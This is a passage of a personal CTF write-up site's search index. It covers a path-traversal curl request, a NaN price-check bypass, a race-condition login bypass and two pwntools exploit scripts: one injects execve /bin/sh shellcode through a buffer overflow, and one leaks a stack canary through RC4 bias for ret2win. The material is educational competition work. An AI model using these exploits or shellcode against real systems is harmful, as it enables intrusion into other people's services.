elsewhere in the filesystem.\nExploit # The challenge tells us the flag is at /app/flag.txt. Since the API probably reads from /app/data/{index}.json, we need to go up one directory:\ncurl -s \u0026#34;https://travel.ctf.pascalctf.it/api/get_json\u0026#34; \\ -X POST \\ -H \u0026#34;Content-Type: application/json\u0026#34; \\ -d \u0026#39;{\u0026#34;index\u0026#34;: \u0026#34;../flag.txt\u0026#34;}\u0026#39; The server constructs the path /app/data/../flag.txt, which resolves to /app/flag.txt, and returns its contents.\nNote: the .json extension might still get appended, but many path traversal vulnerabilities work anyway if the file system ignores the extension or if there\u0026rsquo;s a null byte trick. In this case, it seems the server either doesn\u0026rsquo;t append an extension or the traversal bypasses it.\nFlag # pascalCTF{4ll_1_d0_1s_tr4v3ll1nG_4r0und_th3_w0rld} ","date":"31 January 2026","externalUrl":null,"permalink":"/writeups/ctfs/pascal-26/travel-playlist/","section":"CTFs","summary":"Path traversal via unsanitized file path parameter.","title":"Travel Playlist","type":"ctfs"},{"content":"","date":"31 January 2026","externalUrl":null,"permalink":"/writeups/tags/vm/","section":"Tags","summary":"","title":"Vm","type":"tags"},{"content":"","date":"31 January 2026","externalUrl":null,"permalink":"/writeups/tags/xml/","section":"Tags","summary":"","title":"Xml","type":"tags"},{"content":"","date":"31 January 2026","externalUrl":null,"permalink":"/writeups/tags/xxe/","section":"Tags","summary":"","title":"Xxe","type":"tags"},{"content":"We dont take any responsibility in any damage that our product may cause to the user\u0026rsquo;s health\nA shop where you can buy various \u0026ldquo;Za\u0026rdquo; products. You start with $100 balance, but the flag item \u0026ldquo;RealZa\u0026rdquo; costs $1000.\nThe vulnerability # Looking at the checkout logic in server.js:\nconst prices = { \u0026#34;FakeZa\u0026#34;: 1, \u0026#34;ElectricZa\u0026#34;: 65, \u0026#34;CartoonZa\u0026#34;: 35, \u0026#34;RealZa\u0026#34;: 1000 }; app.post(\u0026#39;/checkout\u0026#39;, (req, res) =\u0026gt; { const cart = req.session.cart; let total = 0; for (const product in cart) { total += prices[product] * cart[product]; } if (total \u0026gt; req.session.balance) { res.json({ \u0026#34;success\u0026#34;: true, \u0026#34;balance\u0026#34;: \u0026#34;Insufficient Balance\u0026#34; }); } else { // Purchase succeeds, items added to inventory // ... } }); The problem: the cart can contain any product name, not just valid ones. If product doesn\u0026rsquo;t exist in prices:\nprices[\u0026#34;RealZa\u0026#34;] * 1 // 1000 prices[\u0026#34;anything\u0026#34;] * 1 // undefined * 1 = NaN 1000 + NaN // NaN NaN \u0026gt; 100 // false Since NaN \u0026gt; 100 is false, the balance check passes.\nExploit # Using Burp Suite:\nLogin - POST to /login with any username/password\nAdd RealZa to cart - POST to /add-cart:\n{\u0026#34;product\u0026#34;:\u0026#34;RealZa\u0026#34;,\u0026#34;quantity\u0026#34;:1} Add a fake product - POST to /add-cart:\n{\u0026#34;product\u0026#34;:\u0026#34;anything\u0026#34;,\u0026#34;quantity\u0026#34;:1} Checkout - POST to /checkout\nGet flag - Visit /inventory\nThe fake product causes prices[\u0026quot;anything\u0026quot;] to be undefined, making the total NaN. The check NaN \u0026gt; 100 returns false, so checkout succeeds despite not having enough balance.\nFlag # pascalCTF{w3_l1v3_f0r_th3_z4z4} ","date":"31 January 2026","externalUrl":null,"permalink":"/writeups/ctfs/pascal-26/zazastore/","section":"CTFs","summary":"NaN comparison bypass in a Node.js shopping cart.","title":"Zazastore","type":"ctfs"},{"content":"","date":"25 January 2026","externalUrl":null,"permalink":"/writeups/ctfs/scarlet-26/","section":"CTFs","summary":"","title":"Scarlet CTF 2026","type":"ctfs"},{"content":"","date":"10 January 2026","externalUrl":null,"permalink":"/writeups/tags/function-pointer/","section":"Tags","summary":"","title":"Function-Pointer","type":"tags"},{"content":"","date":"10 January 2026","externalUrl":null,"permalink":"/writeups/tags/input-buffering/","section":"Tags","summary":"","title":"Input-Buffering","type":"tags"},{"content":"","date":"10 January 2026","externalUrl":null,"permalink":"/writeups/tags/race-condition/","section":"Tags","summary":"","title":"Race-Condition","type":"tags"},{"content":"Take a look at this super l33t login system I made for my Computer Architecture class! Heh\u0026hellip;my prof is gonna be so proud. He\u0026rsquo;s 100% gonna boost my GPA.\nSurely this will be safe to push to prod. I\u0026rsquo;ll even do it for him!\nnc challs.ctf.rusec.club 4622 The challenge provides a university login system with role-based access control. Users authenticate via randomly generated RUIDs (Rutgers University IDs), and different roles grant different privileges.\nBinary protections # Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX unknown - GNU_STACK missing PIE: PIE enabled Stack: Executable RWX: Has RWX segments The binary has most standard protections enabled, but critically, the stack is executable. This immediately suggests a shellcode-based exploitation path.\nReverse engineering # User structure and initialization # The binary defines a user structure that stores names, RUIDs, and function pointers:\nstruct user { char name[32]; uint64_t fn; // function pointer uint64_t ruid; // random user ID }; During initialization, two privileged users are created:\nint64_t setup_users() { char const* names[2]; names[0] = \u0026amp;titles.prof; names[1] = \u0026amp;titles.dean; int64_t (* handlers[2])(); handlers[0] = prof; handlers[1] = dean; for (int32_t i = 0; i \u0026lt;= 1; i += 1) { strcpy(\u0026amp;users[i], (\u0026amp;names)[i], \u0026amp;users); users[i].ruid = rand(); // predictable PRNG users[i].fn = handlers[i]; } } The RUIDs are generated using rand() without seeding, making them completely predictable across runs.\nAuthentication flow # The main loop prompts for a RUID and calls the corresponding user\u0026rsquo;s function pointer if a match is found:\nprintf(\u0026#34;Please enter your RUID: \u0026#34;); uint64_t ruid; scanf(\u0026#34;%lu%*c\u0026#34;, \u0026amp;ruid); for (int32_t i = 0; i \u0026lt;= 1; i += 1) { if (users[i].ruid == ruid) { printf(\u0026#34;Welcome, %s!\\n\u0026#34;, \u0026amp;users[i]); users[i].fn(); // call function pointer match = 1; } } This design allows us to trigger arbitrary function pointers by authenticating as different users.\nVulnerability: dean() overflow # The dean() function allows modifying staff member names but contains a critical buffer overflow:\nint64_t dean() { puts(\u0026#34;Change a staff member\u0026#39;s name!\u0026#34;); list_ruids(); int32_t user_idx; if (get_number(\u0026amp;user_idx, 2)) { printf(\u0026#34;New name: \u0026#34;); read(0, \u0026amp;users[user_idx], 0x29); // writes 41 bytes into 32-byte name } } The read() call accepts 41 bytes into a 32-byte buffer, allowing us to overflow into the function pointer (8 bytes) and partially into the RUID (1 byte).\nShellcode injection point # Early in main(), the program reads a NetID into a stack buffer:\nchar net_id[0x40]; read(0, \u0026amp;net_id, 0x40); Since the stack is executable, this becomes our shellcode injection point.\nExploitation strategy # The attack proceeds in four stages:\nPredict RUIDs - Calculate the deterministic rand() values Inject shellcode - Place shellcode on the stack via the NetID prompt Leak PIE base - Overflow to leak a code pointer Leak stack address - Redirect execution to leak a stack pointer Hijack control flow - Point function pointer to shellcode Predicting RUIDs # Since rand() is unseeded, we can predict the values locally:\nfrom ctypes import CDLL libc = CDLL(\u0026#34;libc.so.6\u0026#34;) prof_ruid = libc.rand() # first rand() -\u0026gt; Professor dean_ruid = libc.rand() # second rand() -\u0026gt; Dean These values remain constant across all executions of the binary.\nStage 1: Shellcode injection # We inject execve shellcode at the NetID prompt:\nshellcode = asm( \u0026#34;\u0026#34;\u0026#34; xor esi, esi xor edx, edx xor eax, eax push rax mov rdi, 0x68732f2f6e69622f push rdi mov rdi, rsp mov al, 59 syscall \u0026#34;\u0026#34;\u0026#34; ) p.sendlineafter(b\u0026#34;Please enter your netID:\u0026#34;, shellcode) This shellcode executes /bin/sh and will be our final target.\nStage 2: PIE leak # We authenticate as the Dean and overflow the Professor\u0026rsquo;s name field:\np.sendlineafter(b\u0026#34;Please enter your RUID:\u0026#34;, str(dean_ruid).encode()) p.sendlineafter(b\u0026#34;Num:\u0026#34;, b\u0026#34;0\u0026#34;) p.sendafter(b\u0026#34;New name:\u0026#34;, b\u0026#34;A\u0026#34; * 32) By writing exactly 32 bytes, we force the function pointer to be printed alongside the name, leaking a code address.\np.recvuntil(b\u0026#34;[0] {RUID REDACTED} \u0026#34;) leak = struct.unpack(\u0026#34;\u0026lt;Q\u0026#34;, p.recvline(keepends=False)[32:].ljust(8, b\u0026#34;\\0\u0026#34;))[0] bin.address = leak - 0x12f3 Stage 3: Stack leak # We overwrite the Professor\u0026rsquo;s function pointer with puts@plt:\np.sendlineafter(b\u0026#34;RUID:\u0026#34;, str(dean_ruid).encode()) p.sendlineafter(b\u0026#34;Num:\u0026#34;, b\u0026#34;0\u0026#34;) p.sendafter(b\u0026#34;New name:\u0026#34;, b\u0026#34;A\u0026#34; * 32 + p64(bin.plt[\u0026#34;puts\u0026#34;])) When we authenticate as the Professor, instead of calling the intended handler, puts() is invoked with the user structure\u0026rsquo;s address, leaking a stack pointer:\np.sendlineafter(b\u0026#34;your RUID:\u0026#34;, str(prof_ruid).encode()) p.recvuntil(b\u0026#34;Welcome\u0026#34;) p.recvline() stack_leak = struct.unpack(\u0026#34;\u0026lt;Q\u0026#34;, p.recvline(keepends=False).ljust(8, b\u0026#34;\\0\u0026#34;))[0] shell_addr = stack_leak + 0x1c0 # calculate shellcode location Stage 4: Shellcode execution # Finally, we overwrite the Professor\u0026rsquo;s function pointer to point to our shellcode:\np.sendlineafter(b\u0026#34;RUID:\u0026#34;, str(dean_ruid).encode()) p.sendlineafter(b\u0026#34;Num:\u0026#34;, b\u0026#34;0\u0026#34;) p.sendafter(b\u0026#34;New name:\u0026#34;, b\u0026#34;A\u0026#34; * 32 + p64(shell_addr)) Authenticating as the Professor now triggers our shellcode:\np.sendlineafter(b\u0026#34;RUID:\u0026#34;, str(prof_ruid).encode()) p.interactive() Final exploit # from ctypes import CDLL from pwn import * context.binary = bin = ELF(\u0026#34;./ruid_login\u0026#34;, checksec=False) libc = CDLL(\u0026#34;libc.so.6\u0026#34;) prof_ruid = libc.rand() dean_ruid = libc.rand() shellcode = asm( \u0026#34;\u0026#34;\u0026#34; xor esi, esi xor edx, edx xor eax, eax push rax mov rdi, 0x68732f2f6e69622f push rdi mov rdi, rsp mov al, 59 syscall \u0026#34;\u0026#34;\u0026#34; ) p = remote(\u0026#34;challs.ctf.rusec.club\u0026#34;, 4622) # Stage 1: Inject shellcode p.sendlineafter(b\u0026#34;Please enter your netID:\u0026#34;, shellcode) # Stage 2: Leak PIE base p.sendlineafter(b\u0026#34;Please enter your RUID:\u0026#34;, str(dean_ruid).encode()) p.sendlineafter(b\u0026#34;Num:\u0026#34;, b\u0026#34;0\u0026#34;) p.sendafter(b\u0026#34;New name:\u0026#34;, b\u0026#34;A\u0026#34; * 32) p.recvuntil(b\u0026#34;[0] {RUID REDACTED} \u0026#34;) leak = struct.unpack(\u0026#34;\u0026lt;Q\u0026#34;, p.recvline(keepends=False)[32:].ljust(8, b\u0026#34;\\0\u0026#34;))[0] bin.address = leak - 0x12f3 # Stage 3: Leak stack address p.sendlineafter(b\u0026#34;RUID:\u0026#34;, str(dean_ruid).encode()) p.sendlineafter(b\u0026#34;Num:\u0026#34;, b\u0026#34;0\u0026#34;) p.sendafter(b\u0026#34;New name:\u0026#34;, b\u0026#34;A\u0026#34; * 32 + p64(bin.plt[\u0026#34;puts\u0026#34;])) p.sendlineafter(b\u0026#34;your RUID:\u0026#34;, str(prof_ruid).encode()) p.recvuntil(b\u0026#34;Welcome\u0026#34;) p.recvline() stack_leak = struct.unpack(\u0026#34;\u0026lt;Q\u0026#34;, p.recvline(keepends=False).ljust(8, b\u0026#34;\\0\u0026#34;))[0] shell_addr = stack_leak + 0x1c0 # Stage 4: Execute shellcode p.sendlineafter(b\u0026#34;RUID:\u0026#34;, str(dean_ruid).encode()) p.sendlineafter(b\u0026#34;Num:\u0026#34;, b\u0026#34;0\u0026#34;) p.sendafter(b\u0026#34;New name:\u0026#34;, b\u0026#34;A\u0026#34; * 32 + p64(shell_addr)) p.sendlineafter(b\u0026#34;RUID:\u0026#34;, str(prof_ruid).encode()) p.interactive() Flag # RUSEC{w0w_th4ts_such_a_l0ng_net1D_w4it_w4it_wh4ts_g0ing_0n_uh_0h} ","date":"10 January 2026","externalUrl":null,"permalink":"/writeups/ctfs/scarlet-26/ruid_login/","section":"CTFs","summary":"Exploiting predictable RUIDs, buffer overflow, and executable stack for shellcode execution.","title":"Ruid_login","type":"ctfs"},{"content":"","date":"10 January 2026","externalUrl":null,"permalink":"/writeups/tags/shellcode/","section":"Tags","summary":"","title":"Shellcode","type":"tags"},{"content":"Its 2026, I need to start journal-maxing. Thats why I use speedjournal, which lets me brain-max my thoughts while time-maxing with the speed of C! Its also security-maxed so only I can read my private entries!\nnc challs.ctf.rusec.club 22169 This challenge presents a simple logging system where the flag is stored in a restricted log entry. Only authenticated admin users should be able to read restricted logs, but a timing vulnerability allows us to bypass this check.\nOverview # The program is a multi-threaded journal application with the following features:\nAdmin authentication with a password Writing new log entries (restricted or public) Reading log entries (with access control for restricted entries) A flag stored in a restricted log at index 0 1. Login admin 2. Write log 3. Read log 4. Exit Vulnerability analysis # The authentication mechanism # When you log in as admin, the system sets a global flag but immediately starts a background thread that resets it after a short delay:\nint is_admin = 0; // global authentication flag void *logout_thread(void *arg) { usleep(WAIT_TIME); // sleep for 1000 microseconds (1ms) is_admin = 0; // automatically log out return NULL; } void login_admin() { char pw[32]; printf(\u0026#34;Admin password: \u0026#34;); fgets(pw, sizeof(pw), stdin); if (strncmp(pw, \u0026#34;supersecret\\n\u0026#34;, 12) == 0) { is_admin = 1; // set admin flag pthread_t t; pthread_create(\u0026amp;t, NULL, logout_thread, NULL); pthread_detach(t); puts(\u0026#34;[+] Admin logged in (temporarily)\u0026#34;); } } The logout happens after only 1000 microseconds (1 millisecond). This seems like it would be too fast to exploit, but there\u0026rsquo;s a critical detail that makes this vulnerable.\nThe access control check # Reading a restricted log requires admin privileges:\nvoid read_log() { int idx; printf(\u0026#34;Index: \u0026#34;); scanf(\u0026#34;%d\u0026#34;, \u0026amp;idx); getchar(); if (idx \u0026lt; 0 || idx \u0026gt;= log_count) { puts(\u0026#34;Invalid index\u0026#34;); return; } if (logs[idx].restricted \u0026amp;\u0026amp; !is_admin) { // race condition here puts(\u0026#34;Access denied\u0026#34;); return; } printf(\u0026#34;Log: %s\\n\u0026#34;, logs[idx].content); } The vulnerability is a race condition between the main thread and the logout thread. While is_admin is set to 1, we have a narrow window to read the restricted log before the background thread resets it to 0.\nInput buffering: the key to exploitation # The critical insight is that scanf() and fgets() read from a buffered input stream. When you send multiple lines at once, they\u0026rsquo;re stored in the input buffer and processed sequentially without delay.\nThis means we can send our entire command sequence instantly:\n1 # Select \u0026#34;Login admin\u0026#34; supersecret # Enter password 3 # Select \u0026#34;Read log\u0026#34; 0 # Read index 0 (the flag) When these commands are all sent together, here\u0026rsquo;s what happens:\nThe program reads 1 from the buffer → calls login_admin() login_admin() reads supersecret\\n from the buffer → sets is_admin = 1 The logout thread is created but hasn\u0026rsquo;t executed yet Control returns to main, which reads 3 from the buffer → calls read_log() read_log() reads 0 from the buffer and checks is_admin → still 1! The flag is printed (Later) The logout thread finally executes Because all the input is pre-buffered, the entire sequence executes much faster than 1 millisecond. The program never has to wait for user input, so it completes before the logout thread can fire.\nExploitation # Method 1: Using pwntools # from pwn import * p = remote(\u0026#34;challs.ctf.rusec.club\u0026#34;, 22169) p.sendafter(b\u0026#34;\u0026gt; \u0026#34;, b\u0026#34;1\\nsupersecret\\n3\\n0\\n\u0026#34;) p.interactive() The sendafter() call waits for the prompt, then sends all four commands at once. They\u0026rsquo;re processed from the buffer faster than the thread can reset is_admin.\nMethod 2: Using netcat and printf # printf \u0026#34;1\\nsupersecret\\n3\\n0\\n\u0026#34; | nc challs.ctf.rusec.club 22169 This pipes all the input at once, achieving the same buffering effect.\nExecution trace # 1. Login admin 2. Write log 3. Read log 4. Exit \u0026gt; Admin password: [+] Admin logged in (temporarily) 1. Login admin 2. Write log 3. Read log 4. Exit \u0026gt; Index: Log: RUSEC{wow_i_did_a_data_race} 1. Login admin 2. Write log 3. Read log 4. Exit \u0026gt; Notice how all the prompts appear sequentially with no delay. The entire sequence completes before the 1ms timer expires.\nWhy this works # The exploit succeeds because of three factors:\nInput buffering: Commands are read from a buffer, not interactively Fast execution: Reading from a buffer is much faster than 1ms Threading timing: The logout thread doesn\u0026rsquo;t preempt the main thread immediately Even though 1 millisecond seems very short, it\u0026rsquo;s an eternity in CPU time. A modern processor can execute millions of instructions in 1ms. Our buffered input is processed in microseconds.\nFlag # RUSEC{wow_i_did_a_data_race} ","date":"10 January 2026","externalUrl":null,"permalink":"/writeups/ctfs/scarlet-26/speedjournal/","section":"CTFs","summary":"Exploiting a TOCTOU race condition to bypass authentication checks.","title":"speedjournal","type":"ctfs"},{"content":"","date":"10 January 2026","externalUrl":null,"permalink":"/writeups/tags/threading/","section":"Tags","summary":"","title":"Threading","type":"tags"},{"content":"","date":"8 November 2025","externalUrl":null,"permalink":"/writeups/tags/bias/","section":"Tags","summary":"","title":"Bias","type":"tags"},{"content":" Grab your resident cryptographer and try our shiny new Encryption-As-A-Service!\nncat --ssl encryptor-pwn.ept.gg 1337 The challenge provides a single ELF binary, encryptor, which exposes a menu-driven encryption service. On startup, it helpfully leaks the address of a forbidden function.\nWelcome to the EPT encryptor! Please behave yourself, and remember to stay away from a certain function at 0x55da2f7324f0! 1. Encrypt a message 2. Reset the key and encrypt again 3. Change offset 4. Exit \u0026gt; Despite PIE being enabled, the address of win() is printed on startup, removing the need for a separate code pointer leak.\nBinary protections # All standard mitigations are enabled.\nArch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled Reverse engineering # Encryption logic # Menu option 1 allows the user to encrypt an arbitrary string.\nif (menu_choice == 1) { printf(\u0026#34;Enter string to encrypt\\n\u0026gt; \u0026#34;); fgets(local_108, 242, stdin); RC4(key, local_108 + local_18, local_1f8, local_108 + local_18); puts_hex(local_1f8); resetKey(); } Two issues immediately stand out:\nfgets() reads 242 bytes into a 240-byte buffer The RC4 input pointer is offset by a stack variable local_18 Relevant stack layout:\nuchar local_1f8[240]; // ciphertext char local_108[240]; // user input Because fgets() writes a trailing null byte, this results in a 1-byte overflow past local_108, corrupting the least significant byte of local_18.\nDisabled offset control # There is a menu option intended to change this offset:\n\u0026gt; 3 Sorry, offset function disabled due to abuse! However, since local_18 is stored directly after the input buffer, the off-by-one overwrite allows us to modify it anyway. This gives indirect control over where RC4 reads plaintext from on the stack.\nStack layout and target # The relevant portion of the stack frame looks like this:\n[ user input buffer ] 240 bytes [ offset variable ] 1 byte (LSB controllable) [ padding ] [ stack canary ] 8 bytes [ saved rbp ] 8 bytes [ return address ] 8 bytes By adjusting the RC4 input offset, we can cause RC4 to encrypt arbitrary stack bytes, including the stack canary.\nRC4 keystream bias # RC4 is a stream cipher that generates a keystream K and encrypts via XOR:\n$$ C = P \\oplus K $$\nRC4 is known to exhibit statistical biases in its early output bytes. In particular, the second keystream byte is biased toward zero with probability:\n$$ \\Pr[K_2 = 0] = \\frac{1}{128} $$\ninstead of the uniform 1/256.\nThis enables a distinguishing attack: if the plaintext byte is constant across encryptions with fresh keys, the most frequent ciphertext byte converges to the plaintext value.\nCanary leakage via bias # We exploit this by:\nForcing RC4 to encrypt a chosen stack byte Aligning that byte with keystream index 2 Repeating encryption with fresh random keys Taking the most frequent ciphertext byte On amd64, the first byte of the stack canary is always 0x00, so only the remaining 7 bytes need to be recovered.\nCanary recovery script # Below is the core logic used to recover the canary one byte at a time.\nfrom pwn import * elf = ELF(\u0026#34;encryptor\u0026#34;) p = process(elf.path) p.recvline() win_addr = int(p.recvline().split(b\u0026#34;at \u0026#34;)[1][2:-1], 16) canary = [0x00] for i in range(1, 8): counts = {j: 0 for j in range(256)} # craft input so the RC4 plaintext pointer lands on canary[i] payload = (b\u0026#34;\\x00\u0026#34; * 240 + p8(0xf7 + i))[:241] p.sendlineafter(b\u0026#34;\u0026gt;\u0026#34;, b\u0026#34;1\u0026#34;) p.sendafter(b\u0026#34;\u0026gt;\u0026#34;, payload) while True: p.sendlineafter(b\u0026#34;\u0026gt;\u0026#34;, b\u0026#34;2\u0026#34;) ct = bytes.fromhex( p.recvline().split(b\u0026#34;Encrypted: \u0026#34;)[1].decode() ) counts[ct[1]] += 1 best = max(counts, key=counts.get) second = sorted(counts.values())[-2] if counts[best] - second \u0026gt; 5: canary.append(best) break canary = bytes(canary) log.success(f\u0026#34;canary = {canary.hex()}\u0026#34;) Notes:\nOnly the least significant byte of the offset is controlled Keystream index 2 is targeted because its bias is strongest The threshold is heuristic and may need tuning on remote Example output:\ncanary = 6f28c7b1a4923e00 ret2win # The binary contains a hidden menu option:\nif (menu_choice == 1337) { printf(\u0026#34;Leaving already? Enter feedback:\\n\u0026gt; \u0026#34;); fgets(local_108, 288, stdin); } This reads 288 bytes into a 240-byte buffer, allowing full control of the return address.\nWith the stack canary known and win() already leaked, exploitation is trivial.\nFinal payload # p.sendlineafter(b\u0026#34;\u0026gt;\u0026#34;, b\u0026#34;1337\u0026#34;) p.sendlineafter( b\u0026#34;\u0026gt;\u0026#34;, b\u0026#34;A\u0026#34; * 0xf8 + canary + b\u0026#34;B\u0026#34; * 8 + p64(win_addr) ) p.interactive() Successful execution:\nEPT{test_flag} Final solve script # Below is the consolidated exploit used locally and remotely.\nfrom pwn import * elf = ELF(\u0026#34;encryptor\u0026#34;) p = process(elf.path) p.recvline() win_addr = int(p.recvline().split(b\u0026#34;at \u0026#34;)[1][2:-1], 16) canary = [0x00] for i in range(1, 8): counts = {j: 0 for j in range(256)} payload = (b\u0026#34;\\x00\u0026#34; * 240 + p8(0xf7 + i))[:241] p.sendlineafter(b\u0026#34;\u0026gt;\u0026#34;, b\u0026#34;1\u0026#34;) p.sendafter(b\u0026#34;\u0026gt;\u0026#34;, payload) while True: p.sendlineafter(b\u0026#34;\u0026gt;\u0026#34;, b\u0026#34;2\u0026#34;) ct = bytes.fromhex( p.recvline().split(b\u0026#34;Encrypted: \u0026#34;)[1].decode() ) counts[ct[1]] += 1 best = max(counts, key=counts.get) second = sorted(counts.values())[-2] if counts[best] - second \u0026gt; 5: canary.append(best) break canary = bytes(canary) p.sendlineafter(b\u0026#34;\u0026gt;\u0026#34;, b\u0026#34;1337\u0026#34;) p.sendlineafter( b\u0026#34;\u0026gt;\u0026#34;, b\u0026#34;A\u0026#34; * 0xf8 + canary + b\u0026#34;B\u0026#34; * 8 + p64(win_addr) ) print(p.recvall().decode()) Takeaways # RC4 remains exploitable even outside traditional network protocols Single-byte overwrites are often sufficient to defeat stack canaries Cryptographic bias can be weaponized as an information leak Disabling functionality does not remove its security impact This challenge is a good example of cryptographic weaknesses amplifying memory corruption rather than replacing it.\n","date":"8 November 2025","externalUrl":null,"permalink":"/writeups/ctfs/ept-25/encryptor/","section":"CTFs","summary":"Leaking a stack canary using RC4 keystream bias, then ret2win.","title":"Encryptor","type":"ctfs"},{"content":"","date":"8 November 2025","externalUrl":null,"permalink":"/writeups/ctfs/ept-25/","section":"CTFs","summary":"","title":"Equinor CTF 2025","type":"ctfs"},{"content":"","date":"8 November 2025","externalUrl":null,"permalink":"/writeups/tags/rc4/","section":"Tags","summary":"","title":"Rc4","type":"tags"},{"content":"","date":"8 November 2025","externalUrl":null,"permalink":"/writeups/tags/stack-canary/","section":"Tags","summary":"","title":"Stack-Canary","type":"tags"},{"content":"","date":"8 November 2025","externalUrl":null,"permalink":"/writeups/tags/stream-cipher/","section":"Tags","summary":"","title":"Stream-Cipher","type":"tags"},{"content":"Hey, I\u0026rsquo;m Frederik. I publish CTF writeups and technical notes here.\nFocus\nBinary exploitation, crypto, reverse engineering, and web security CTFs, security research, and writeups worth sharing ","externalUrl":null,"permalink":"/writeups/about/","section":"About","summary":"Who I am, where to find me, and what I enjoy breaking.","title":"About","type":"about"},{"content":"","externalUrl":null,"permalink":"/writeups/topics/ctfs/","section":"Topics","summary":"Writeups grouped by competition.","title":"CTFs","type":"topics"}]